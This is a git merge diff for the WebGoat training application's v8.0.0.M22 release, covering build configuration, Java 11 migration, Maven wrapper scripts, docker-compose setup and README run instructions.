Merge branch 'release/v8.0.0.M22'

.gitignore

@@ -44,5 +44,10 @@ webgoat-server/mongo-data/*
 webgoat-lessons/vulnerable-components/dependency-reduced-pom.xml
 **/.sts4-cache/*
 **/.vscode/*
-
+**/.factorypath
 /.sonatype
+**/bin/*
+webgoat.lck
+webgoat.log
+webgoat.properties
+webgoat.script

.mvn/wrapper/maven-wrapper.properties

@@ -0,0 +1 @@
+distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.5.4/apache-maven-3.5.4-bin.zip

.travis.yml

@@ -2,7 +2,7 @@ services:
   - docker
 language: java
 jdk:
-- oraclejdk8
+- openjdk11
 install: "/bin/true"
 script:
 - export BRANCH=$(if [ "$TRAVIS_PULL_REQUEST" == "false" ]; then echo $TRAVIS_BRANCH; else echo $TRAVIS_PULL_REQUEST_BRANCH; fi)

CREATE_RELEASE.MD

@@ -13,17 +13,13 @@ At the moment we use Gitflow, for a release you create a new release branch and
 git checkout develop
 git flow release start <version>
 mvn versions:set <<version>  
-git commit -am "New release, updaing pom.xml" 
+git commit -am "New release, updating pom.xml" 
 git flow release publish
-```
+git push --tags
-
-Now we can make a new release, be sure you committed all your changes.
-
-```
-git tag v8.0.0.M15
-git push origin v8.0.0.M15 
 ```
 
 Now Travis takes over and will create the release in Github and on Docker Hub.
 
+NOTE: the `mvn versions:set` command above is just there to make sure the master branch contains the latest version
+
 

README.MD

@@ -34,55 +34,42 @@ first thing that all hackers claim.*
 Download the latest WebGoat release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```Shell
-java -jar webgoat-server-<<version>>.jar [--server.port=8080] [--server.address=localhost]
+java -jar webgoat-server-8.0.0.VERSION.jar [--server.port=8080] [--server.address=localhost]
 ```
 
 By default WebGoat starts on port 8080 with `--server.port` you can specify a different port. With `server.address` you
 can bind it to a different address (default localhost)
 
+If you use Java 9 or higher you need to run WebGoat as follows:
+
+```Shell
+java --add-modules java.xml.bind -jar webgoat-server-8.0.0.VERSION.jar
+```
+
 ## 2. Run using Docker
 
-From time to time we publish a new development preview of WebGoat 8 on Docker HUB, you can download this version
+Every release is also published on [DockerHub]((https://hub.docker.com/r/webgoat/webgoat-8.0/)).
-[https://hub.docker.com/r/webgoat/webgoat-8.0/](https://hub.docker.com/r/webgoat/webgoat-8.0/).
-First install Docker, then open a command shell/window and type:
 
-```Shell
+### Using docker-compose
-docker pull webgoat/webgoat-8.0
+
-docker run -p 8080:8080 -it webgoat/webgoat-8.0 /home/webgoat/start.sh 
+The easiest way to start WebGoat as a Docker container is to use the `docker-compose.yml` [file](https://raw.githubusercontent.com/WebGoat/WebGoat/develop/docker-compose.yml) 
+from our Github repository. This will start both containers and it also takes care of setting up the
+connection between WebGoat and WebWolf.
+
+```shell
+curl https://raw.githubusercontent.com/WebGoat/WebGoat/develop/docker-compose.yml | docker-compose -f - up
 ```
 
-If you want to keep the database between Docker sessions you need to map the WebGoat data directory to a 
+**Important**: the current directory on your host will be mapped into the container for keeping state.
-folder on the host system as follows:
-
-```Shell
-docker run -p 8080:8080 -it -v /tmp/webgoat-data:/home/webgoat/.webgoat-${VERSION} webgoat/webgoat-8.0 /home/webgoat/start.sh
-```
-
-where `${VERSION}` is for example `v8.0.0.M14`. The data will now be stored in `/tmp/webgoat-data` on your host system.
-
-Wait for the Docker container to start, and run `docker ps` to verify it's running.
-
-- If you are using `docker-machine`, verify the machine IP using `docker-machine env`
-- If you are using `boot2docker` on OSX, verify the IP by running `docker network inspect bridge`
-- Otherwise, the host will be bound to localhost
-
-Once you have the IP and port, you'll want to navigate to the `/WebGoat` path in the URL. For example:
-
-```
-http://192.168.99.100:8080/WebGoat
-```
-
-Here you'll be able to register a new user and get started.
-
-_Please note: this version may not be completely in sync with the develop branch._
 
+Using the `docker-compose` file will simplify getting WebGoat and WebWolf up and running.
 
 
 ## 3. Run from the sources
 
 ### Prerequisites:
 
-* Java 8
+* Java 11
 * Maven > 3.2.1
 * Your favorite IDE
 * Git, or Git support in your IDE
@@ -117,7 +104,7 @@ server.address=x.x.x.x
 
 # Vagrant
 
-We supply a complete development environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed.
+We supply a complete environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed.
 
 ```shell
    $ cd WebGoat/webgoat-images/vagrant-training
@@ -125,7 +112,7 @@ We supply a complete development environment using Vagrant, to run WebGoat with
 ```
 
 Once the provisioning is complete login to the Virtualbox with username vagrant and password vagrant.
-The source code will be available in the home directory.
+WebGoat and WebWolf will automatically start when you login to this image.
 
 
 # Building a new Docker image

docker-compose-local.yml

@@ -0,0 +1,13 @@
+version: '2.1'
+
+services:
+  webgoat:
+    image: webgoat/webgoat-v8.0.0.snapshot
+    extends:
+      file: docker-compose.yml
+      service: webgoat
+  webwolf:
+    extends:
+      file: docker-compose.yml
+      service: webwolf
+    image: webgoat/webwolf-v8.0.0.snapshot

docker-compose-postgres.yml

@@ -12,6 +12,8 @@ services:
       - spring.datasource.password=webgoat
       - spring.datasource.driver-class-name=org.postgresql.Driver
       - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect
+      - webgoat.server.directory=/home/webgoat/.webgoat/
+      - webgoat.user.directory=/home/webgoat/.webgoat/
     ports:
       - "8080:8080"
   webwolf:
@@ -24,9 +26,11 @@ services:
       - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect
     ports:
       - "9090:9090"
-  db:
+  webgoat_db:
-    container_name: webgoat_db
+    image: postgres:9.4
-    image: postgres:latest
+# Uncomment to store the state of the database on the host.
+#    volumes:
+#      - ./database:/var/lib/postgresql
     environment:
       - POSTGRES_PASSWORD=webgoat
       - POSTGRES_USER=webgoat

docker-compose.yml

@@ -6,24 +6,13 @@ services:
     environment:
       - WEBWOLF_HOST=webwolf
       - WEBWOLF_PORT=9090
-      - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat
     ports:
       - "8080:8080"
-    depends_on:
+      - "9001:9001"
-      - db
+    volumes:
+      - .:/home/webgoat/.webgoat
   webwolf:
     image: webgoat/webwolf
-    environment:
-          - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat
     ports:
       - "9090:9090"
-    depends_on:
+    command: --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat --server.address=0.0.0.0
-      - db
-  db:
-    image: blacklabelops/hsqldb
-    container_name: webgoat_db
-    environment:
-      - HSQLDB_TRACE=false
-      - HSQLDB_SILENT=true
-      - HSQLDB_DATABASE_NAME=webgoat
-      - HSQLDB_DATABASE_ALIAS=webgoat

mvnw

@@ -0,0 +1,286 @@
+#!/bin/sh
+# ----------------------------------------------------------------------------
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#    http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+# ----------------------------------------------------------------------------
+
+# ----------------------------------------------------------------------------
+# Maven2 Start Up Batch script
+#
+# Required ENV vars:
+# ------------------
+#   JAVA_HOME - location of a JDK home dir
+#
+# Optional ENV vars
+# -----------------
+#   M2_HOME - location of maven2's installed home dir
+#   MAVEN_OPTS - parameters passed to the Java VM when running Maven
+#     e.g. to debug Maven itself, use
+#       set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
+#   MAVEN_SKIP_RC - flag to disable loading of mavenrc files
+# ----------------------------------------------------------------------------
+
+if [ -z "$MAVEN_SKIP_RC" ] ; then
+
+  if [ -f /etc/mavenrc ] ; then
+    . /etc/mavenrc
+  fi
+
+  if [ -f "$HOME/.mavenrc" ] ; then
+    . "$HOME/.mavenrc"
+  fi
+
+fi
+
+# OS specific support.  $var _must_ be set to either true or false.
+cygwin=false;
+darwin=false;
+mingw=false
+case "`uname`" in
+  CYGWIN*) cygwin=true ;;
+  MINGW*) mingw=true;;
+  Darwin*) darwin=true
+    # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home
+    # See https://developer.apple.com/library/mac/qa/qa1170/_index.html
+    if [ -z "$JAVA_HOME" ]; then
+      if [ -x "/usr/libexec/java_home" ]; then
+        export JAVA_HOME="`/usr/libexec/java_home`"
+      else
+        export JAVA_HOME="/Library/Java/Home"
+      fi
+    fi
+    ;;
+esac
+
+if [ -z "$JAVA_HOME" ] ; then
+  if [ -r /etc/gentoo-release ] ; then
+    JAVA_HOME=`java-config --jre-home`
+  fi
+fi
+
+if [ -z "$M2_HOME" ] ; then
+  ## resolve links - $0 may be a link to maven's home
+  PRG="$0"
+
+  # need this for relative symlinks
+  while [ -h "$PRG" ] ; do
+    ls=`ls -ld "$PRG"`
+    link=`expr "$ls" : '.*-> \(.*\)$'`
+    if expr "$link" : '/.*' > /dev/null; then
+      PRG="$link"
+    else
+      PRG="`dirname "$PRG"`/$link"
+    fi
+  done
+
+  saveddir=`pwd`
+
+  M2_HOME=`dirname "$PRG"`/..
+
+  # make it fully qualified
+  M2_HOME=`cd "$M2_HOME" && pwd`
+
+  cd "$saveddir"
+  # echo Using m2 at $M2_HOME
+fi
+
+# For Cygwin, ensure paths are in UNIX format before anything is touched
+if $cygwin ; then
+  [ -n "$M2_HOME" ] &&
+    M2_HOME=`cygpath --unix "$M2_HOME"`
+  [ -n "$JAVA_HOME" ] &&
+    JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
+  [ -n "$CLASSPATH" ] &&
+    CLASSPATH=`cygpath --path --unix "$CLASSPATH"`
+fi
+
+# For Mingw, ensure paths are in UNIX format before anything is touched
+if $mingw ; then
+  [ -n "$M2_HOME" ] &&
+    M2_HOME="`(cd "$M2_HOME"; pwd)`"
+  [ -n "$JAVA_HOME" ] &&
+    JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`"
+  # TODO classpath?
+fi
+
+if [ -z "$JAVA_HOME" ]; then
+  javaExecutable="`which javac`"
+  if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then
+    # readlink(1) is not available as standard on Solaris 10.
+    readLink=`which readlink`
+    if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then
+      if $darwin ; then
+        javaHome="`dirname \"$javaExecutable\"`"
+        javaExecutable="`cd \"$javaHome\" && pwd -P`/javac"
+      else
+        javaExecutable="`readlink -f \"$javaExecutable\"`"
+      fi
+      javaHome="`dirname \"$javaExecutable\"`"
+      javaHome=`expr "$javaHome" : '\(.*\)/bin'`
+      JAVA_HOME="$javaHome"
+      export JAVA_HOME
+    fi
+  fi
+fi
+
+if [ -z "$JAVACMD" ] ; then
+  if [ -n "$JAVA_HOME"  ] ; then
+    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
+      # IBM's JDK on AIX uses strange locations for the executables
+      JAVACMD="$JAVA_HOME/jre/sh/java"
+    else
+      JAVACMD="$JAVA_HOME/bin/java"
+    fi
+  else
+    JAVACMD="`which java`"
+  fi
+fi
+
+if [ ! -x "$JAVACMD" ] ; then
+  echo "Error: JAVA_HOME is not defined correctly." >&2
+  echo "  We cannot execute $JAVACMD" >&2
+  exit 1
+fi
+
+if [ -z "$JAVA_HOME" ] ; then
+  echo "Warning: JAVA_HOME environment variable is not set."
+fi
+
+CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher
+
+# traverses directory structure from process work directory to filesystem root
+# first directory with .mvn subdirectory is considered project base directory
+find_maven_basedir() {
+
+  if [ -z "$1" ]
+  then
+    echo "Path not specified to find_maven_basedir"
+    return 1
+  fi
+
+  basedir="$1"
+  wdir="$1"
+  while [ "$wdir" != '/' ] ; do
+    if [ -d "$wdir"/.mvn ] ; then
+      basedir=$wdir
+      break
+    fi
+    # workaround for JBEAP-8937 (on Solaris 10/Sparc)
+    if [ -d "${wdir}" ]; then
+      wdir=`cd "$wdir/.."; pwd`
+    fi
+    # end of workaround
+  done
+  echo "${basedir}"
+}
+
+# concatenates all lines of a file
+concat_lines() {
+  if [ -f "$1" ]; then
+    echo "$(tr -s '\n' ' ' < "$1")"
+  fi
+}
+
+BASE_DIR=`find_maven_basedir "$(pwd)"`
+if [ -z "$BASE_DIR" ]; then
+  exit 1;
+fi
+
+##########################################################################################
+# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
+# This allows using the maven wrapper in projects that prohibit checking in binary data.
+##########################################################################################
+if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then
+    if [ "$MVNW_VERBOSE" = true ]; then
+      echo "Found .mvn/wrapper/maven-wrapper.jar"
+    fi
+else
+    if [ "$MVNW_VERBOSE" = true ]; then
+      echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..."
+    fi
+    jarUrl="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.4.2/maven-wrapper-0.4.2.jar"
+    while IFS="=" read key value; do
+      case "$key" in (wrapperUrl) jarUrl="$value"; break ;;
+      esac
+    done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties"
+    if [ "$MVNW_VERBOSE" = true ]; then
+      echo "Downloading from: $jarUrl"
+    fi
+    wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar"
+
+    if command -v wget > /dev/null; then
+        if [ "$MVNW_VERBOSE" = true ]; then
+          echo "Found wget ... using wget"
+        fi
+        wget "$jarUrl" -O "$wrapperJarPath"
+    elif command -v curl > /dev/null; then
+        if [ "$MVNW_VERBOSE" = true ]; then
+          echo "Found curl ... using curl"
+        fi
+        curl -o "$wrapperJarPath" "$jarUrl"
+    else
+        if [ "$MVNW_VERBOSE" = true ]; then
+          echo "Falling back to using Java to download"
+        fi
+        javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java"
+        if [ -e "$javaClass" ]; then
+            if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
+                if [ "$MVNW_VERBOSE" = true ]; then
+                  echo " - Compiling MavenWrapperDownloader.java ..."
+                fi
+                # Compiling the Java class
+                ("$JAVA_HOME/bin/javac" "$javaClass")
+            fi
+            if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
+                # Running the downloader
+                if [ "$MVNW_VERBOSE" = true ]; then
+                  echo " - Running MavenWrapperDownloader.java ..."
+                fi
+                ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR")
+            fi
+        fi
+    fi
+fi
+##########################################################################################
+# End of extension
+##########################################################################################
+
+export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"}
+if [ "$MVNW_VERBOSE" = true ]; then
+  echo $MAVEN_PROJECTBASEDIR
+fi
+MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS"
+
+# For Cygwin, switch paths to Windows format before running java
+if $cygwin; then
+  [ -n "$M2_HOME" ] &&
+    M2_HOME=`cygpath --path --windows "$M2_HOME"`
+  [ -n "$JAVA_HOME" ] &&
+    JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"`
+  [ -n "$CLASSPATH" ] &&
+    CLASSPATH=`cygpath --path --windows "$CLASSPATH"`
+  [ -n "$MAVEN_PROJECTBASEDIR" ] &&
+    MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"`
+fi
+
+WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
+
+exec "$JAVACMD" \
+  $MAVEN_OPTS \
+  -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \
+  "-Dmaven.home=${M2_HOME}" "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
+  ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"

mvnw.cmd

@@ -0,0 +1,161 @@
+@REM ----------------------------------------------------------------------------
+@REM Licensed to the Apache Software Foundation (ASF) under one
+@REM or more contributor license agreements.  See the NOTICE file
+@REM distributed with this work for additional information
+@REM regarding copyright ownership.  The ASF licenses this file
+@REM to you under the Apache License, Version 2.0 (the
+@REM "License"); you may not use this file except in compliance
+@REM with the License.  You may obtain a copy of the License at
+@REM
+@REM    http://www.apache.org/licenses/LICENSE-2.0
+@REM
+@REM Unless required by applicable law or agreed to in writing,
+@REM software distributed under the License is distributed on an
+@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+@REM KIND, either express or implied.  See the License for the
+@REM specific language governing permissions and limitations
+@REM under the License.
+@REM ----------------------------------------------------------------------------
+
+@REM ----------------------------------------------------------------------------
+@REM Maven2 Start Up Batch script
+@REM
+@REM Required ENV vars:
+@REM JAVA_HOME - location of a JDK home dir
+@REM
+@REM Optional ENV vars
+@REM M2_HOME - location of maven2's installed home dir
+@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
+@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a key stroke before ending
+@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
+@REM     e.g. to debug Maven itself, use
+@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
+@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
+@REM ----------------------------------------------------------------------------
+
+@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
+@echo off
+@REM set title of command window
+title %0
+@REM enable echoing my setting MAVEN_BATCH_ECHO to 'on'
+@if "%MAVEN_BATCH_ECHO%" == "on"  echo %MAVEN_BATCH_ECHO%
+
+@REM set %HOME% to equivalent of $HOME
+if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")
+
+@REM Execute a user defined script before this one
+if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
+@REM check for pre script, once with legacy .bat ending and once with .cmd ending
+if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat"
+if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd"
+:skipRcPre
+
+@setlocal
+
+set ERROR_CODE=0
+
+@REM To isolate internal variables from possible post scripts, we use another setlocal
+@setlocal
+
+@REM ==== START VALIDATION ====
+if not "%JAVA_HOME%" == "" goto OkJHome
+
+echo.
+echo Error: JAVA_HOME not found in your environment. >&2
+echo Please set the JAVA_HOME variable in your environment to match the >&2
+echo location of your Java installation. >&2
+echo.
+goto error
+
+:OkJHome
+if exist "%JAVA_HOME%\bin\java.exe" goto init
+
+echo.
+echo Error: JAVA_HOME is set to an invalid directory. >&2
+echo JAVA_HOME = "%JAVA_HOME%" >&2
+echo Please set the JAVA_HOME variable in your environment to match the >&2
+echo location of your Java installation. >&2
+echo.
+goto error
+
+@REM ==== END VALIDATION ====
+
+:init
+
+@REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
+@REM Fallback to current working directory if not found.
+
+set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
+IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir
+
+set EXEC_DIR=%CD%
+set WDIR=%EXEC_DIR%
+:findBaseDir
+IF EXIST "%WDIR%"\.mvn goto baseDirFound
+cd ..
+IF "%WDIR%"=="%CD%" goto baseDirNotFound
+set WDIR=%CD%
+goto findBaseDir
+
+:baseDirFound
+set MAVEN_PROJECTBASEDIR=%WDIR%
+cd "%EXEC_DIR%"
+goto endDetectBaseDir
+
+:baseDirNotFound
+set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
+cd "%EXEC_DIR%"
+
+:endDetectBaseDir
+
+IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig
+
+@setlocal EnableExtensions EnableDelayedExpansion
+for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
+@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%
+
+:endReadAdditionalConfig
+
+SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
+set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
+set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
+
+set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.4.2/maven-wrapper-0.4.2.jar"
+FOR /F "tokens=1,2 delims==" %%A IN (%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties) DO (
+	IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B 
+)
+
+@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
+@REM This allows using the maven wrapper in projects that prohibit checking in binary data.
+if exist %WRAPPER_JAR% (
+    echo Found %WRAPPER_JAR%
+) else (
+    echo Couldn't find %WRAPPER_JAR%, downloading it ...
+	echo Downloading from: %DOWNLOAD_URL%
+    powershell -Command "(New-Object Net.WebClient).DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"
+    echo Finished downloading %WRAPPER_JAR%
+)
+@REM End of extension
+
+%MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
+if ERRORLEVEL 1 goto error
+goto end
+
+:error
+set ERROR_CODE=1
+
+:end
+@endlocal & set ERROR_CODE=%ERROR_CODE%
+
+if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost
+@REM check for post script, once with legacy .bat ending and once with .cmd ending
+if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat"
+if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd"
+:skipRcPost
+
+@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
+if "%MAVEN_BATCH_PAUSE%" == "on" pause
+
+if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE%
+
+exit /B %ERROR_CODE%

pom.xml

@@ -6,7 +6,7 @@
     <groupId>org.owasp.webgoat</groupId>
     <artifactId>webgoat-parent</artifactId>
     <packaging>pom</packaging>
-    <version>v8.0.0.M20</version>
+    <version>v8.0.0.M22</version>
 
     <name>WebGoat Parent Pom</name>
     <description>Parent Pom for the WebGoat Project. A deliberately insecure Web Application</description>
@@ -21,7 +21,7 @@
     <parent>
         <groupId>org.springframework.boot</groupId>
         <artifactId>spring-boot-starter-parent</artifactId>
-        <version>1.5.12.RELEASE</version>
+        <version>1.5.18.RELEASE</version>
     </parent>
 
     <licenses>
@@ -107,9 +107,6 @@
     </ciManagement>
 
     <properties>
-        <maven.compiler.source>1.8</maven.compiler.source>
-        <maven.compiler.target>1.8</maven.compiler.target>
-
         <!-- Use UTF-8 Encoding -->
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
         <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
@@ -129,7 +126,7 @@
         <commons-digester.version>2.1</commons-digester.version>
         <commons-discovery.version>0.5</commons-discovery.version>
         <commons-fileupload.version>1.3.1</commons-fileupload.version>
-        <commons-io.version>2.4</commons-io.version>
+        <commons-io.version>2.6</commons-io.version>
         <commons-lang3.version>3.4</commons-lang3.version>
         <coveralls-maven-plugin.version>4.0.0</coveralls-maven-plugin.version>
         <gatling.version>2.2.5</gatling.version>
@@ -141,30 +138,25 @@
         <jackson-core.version>2.6.3</jackson-core.version>
         <jackson-databind.version>2.6.3</jackson-databind.version>
         <javaee-api.version>6.0</javaee-api.version>
-        <javax.transaction-api.version>1.2</javax.transaction-api.version>
+        <javax.transaction-api.version>1.3</javax.transaction-api.version>
         <jcl-over-slf4j.version>1.7.12</jcl-over-slf4j.version>
         <jtds.version>1.3.1</jtds.version>
         <junit.version>4.12</junit.version>
+        <lombok.version>1.18.4</lombok.version>
         <mail-api.version>1.5.4</mail-api.version>
-        <maven-compiler-plugin.version>3.3</maven-compiler-plugin.version>
+        <maven-compiler-plugin.version>3.8.0</maven-compiler-plugin.version>
-        <maven-failsafe-plugin.version>2.19</maven-failsafe-plugin.version>
+        <maven-failsafe-plugin.version>2.22.0</maven-failsafe-plugin.version>
         <maven-gpg-plugin.version>1.6</maven-gpg-plugin.version>
         <maven-jar-plugin.version>2.6</maven-jar-plugin.version>
         <maven-javadoc-plugin.version>2.10.4</maven-javadoc-plugin.version>
         <maven-release-plugin.version>2.5.2</maven-release-plugin.version>
         <maven-source-plugin.version>3.0.1</maven-source-plugin.version>
-        <maven-surefire-plugin.version>2.19</maven-surefire-plugin.version>
+        <maven-surefire-plugin.version>2.22.0</maven-surefire-plugin.version>
         <nexus-staging-maven-plugin.version>1.6.6</nexus-staging-maven-plugin.version>
         <scala.version>2.11.7</scala.version>
         <sauce_junit.version>2.1.20</sauce_junit.version>
         <selenium-java.version>2.48.2</selenium-java.version>
         <spring.security.version>3.2.4.RELEASE</spring.security.version>
-        <standard.version>1.1.2</standard.version>
-        <tiles.version>3.0.5</tiles.version>
-        <tomcat-catalina.version>7.0.65</tomcat-catalina.version>
-        <tomcat7-maven-plugin.version>2.3-SNAPSHOT</tomcat7-maven-plugin.version>
-        <versioneye-maven-plugin.version>3.5.1</versioneye-maven-plugin.version>
-        <wsdl4j.version>1.6.3</wsdl4j.version>
     </properties>
 
     <modules>
@@ -200,105 +192,12 @@
         </pluginRepository>
     </pluginRepositories>
 
-    <profiles>
-        <profile>
-            <id>release</id>
-            <dependencies>
-                <dependency>
-                    <groupId>org.owasp.webgoat.lesson</groupId>
-                    <artifactId>dist</artifactId>
-                    <version>1.0</version>
-                    <type>zip</type>
-                    <scope>provided</scope>
-                    <classifier>plugins</classifier>
-                </dependency>
-            </dependencies>
-            <build>
-                <plugins>
-                    <plugin>
-                        <groupId>org.apache.maven.plugins</groupId>
-                        <artifactId>maven-dependency-plugin</artifactId>
-                        <executions>
-                            <execution>
-                                <id>unpack-lesson</id>
-                                <goals>
-                                    <goal>unpack-dependencies</goal>
-                                </goals>
-                                <phase>generate-resources</phase>
-                                <configuration>
-                                    <outputDirectory>
-                                        ${project.basedir}/webgoat-container/src/main/webapp/plugin_lessons
-                                    </outputDirectory>
-                                    <includeArtifactIds>dist</includeArtifactIds>
-                                    <includes>*.jar</includes>
-                                </configuration>
-                            </execution>
-                        </executions>
-                    </plugin>
-                    <plugin>
-                        <groupId>org.sonatype.plugins</groupId>
-                        <artifactId>nexus-staging-maven-plugin</artifactId>
-                        <version>${nexus-staging-maven-plugin.version}</version>
-                        <extensions>true</extensions>
-                        <configuration>
-                            <serverId>ossrh</serverId>
-                            <nexusUrl>https://oss.sonatype.org/</nexusUrl>
-                            <autoReleaseAfterClose>false</autoReleaseAfterClose>
-                        </configuration>
-                    </plugin>
-                    <plugin>
-                        <groupId>org.apache.maven.plugins</groupId>
-                        <artifactId>maven-source-plugin</artifactId>
-                        <version>${maven-source-plugin.version}</version>
-                        <executions>
-                            <execution>
-                                <id>attach-sources</id>
-                                <goals>
-                                    <goal>jar-no-fork</goal>
-                                </goals>
-                            </execution>
-                        </executions>
-                    </plugin>
-                    <plugin>
-                        <groupId>org.apache.maven.plugins</groupId>
-                        <artifactId>maven-javadoc-plugin</artifactId>
-                        <version>${maven-javadoc-plugin.version}</version>
-                        <executions>
-                            <execution>
-                                <id>attach-javadocs</id>
-                                <goals>
-                                    <goal>jar</goal>
-                                </goals>
-                            </execution>
-                        </executions>
-                    </plugin>
-                    <plugin>
-                        <groupId>org.apache.maven.plugins</groupId>
-                        <artifactId>maven-gpg-plugin</artifactId>
-                        <version>${maven-gpg-plugin.version}</version>
-                        <executions>
-                            <execution>
-                                <id>sign-artifacts</id>
-                                <phase>verify</phase>
-                                <goals>
-                                    <goal>sign</goal>
-                                </goals>
-                                <configuration>
-                                    <keyname>WebGoat</keyname>
-                                </configuration>
-                            </execution>
-                        </executions>
-                    </plugin>
-                </plugins>
-            </build>
-        </profile>
-    </profiles>
-
     <dependencies>
         <dependency>
             <groupId>org.projectlombok</groupId>
             <artifactId>lombok</artifactId>
             <scope>provided</scope>
+            <version>${lombok.version}</version>
             <optional>true</optional>
         </dependency>
         <dependency>
@@ -306,10 +205,25 @@
             <artifactId>commons-exec</artifactId>
             <version>1.3</version>
         </dependency>
+        <dependency>
+            <groupId>javax.xml.bind</groupId>
+            <artifactId>jaxb-api</artifactId>
+            <version>2.3.0</version>
+        </dependency>
     </dependencies>
 
     <build>
         <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>${maven-compiler-plugin.version}</version>
+                <configuration>
+                    <source>11</source>
+                    <target>11</target>
+                    <encoding>UTF-8</encoding>
+                </configuration>
+            </plugin>
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-release-plugin</artifactId>
@@ -342,15 +256,6 @@
                     <aggregate>true</aggregate>
                 </configuration>
             </plugin>
